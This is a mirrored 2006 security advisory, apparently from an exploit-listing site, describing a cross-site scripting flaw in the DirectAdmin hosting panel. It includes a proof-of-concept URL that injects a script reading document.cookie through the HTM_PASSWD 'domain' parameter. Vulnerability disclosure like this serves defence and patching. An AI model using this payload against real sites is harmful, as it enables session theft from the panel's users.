Advertisement




Edit Report

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006050027

Below is a copy:

#'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''

#Aria-Security.net Advisory

#Discovered  by: O.U.T.L.A.W

#Outlaw (at) aria-security (dot) net [email concealed]

#Gr33t to:A.u.r.a  & [email protected] & Cl0wn & Dtrap

#'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''

? Software: DirectAdmin

? Support Website: http://www.Directadmin.com

? advisory:http://www.aria-security.net/advisory/hm/directadmin.txt

? Summary: DirectAdmin Is A Hosting Managment System

? Tested On: http://www.directadmin.com/demo.html

? Proof of Concept:

LOCAL XSS attack:

http://www.directadmin.com:2222/HTM_PASSWD?domain=".><script>alert(docum
ent.cookie)</script><!--

?Solution:

?contact advisory (at) aria-security (dot) net [email concealed]

Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.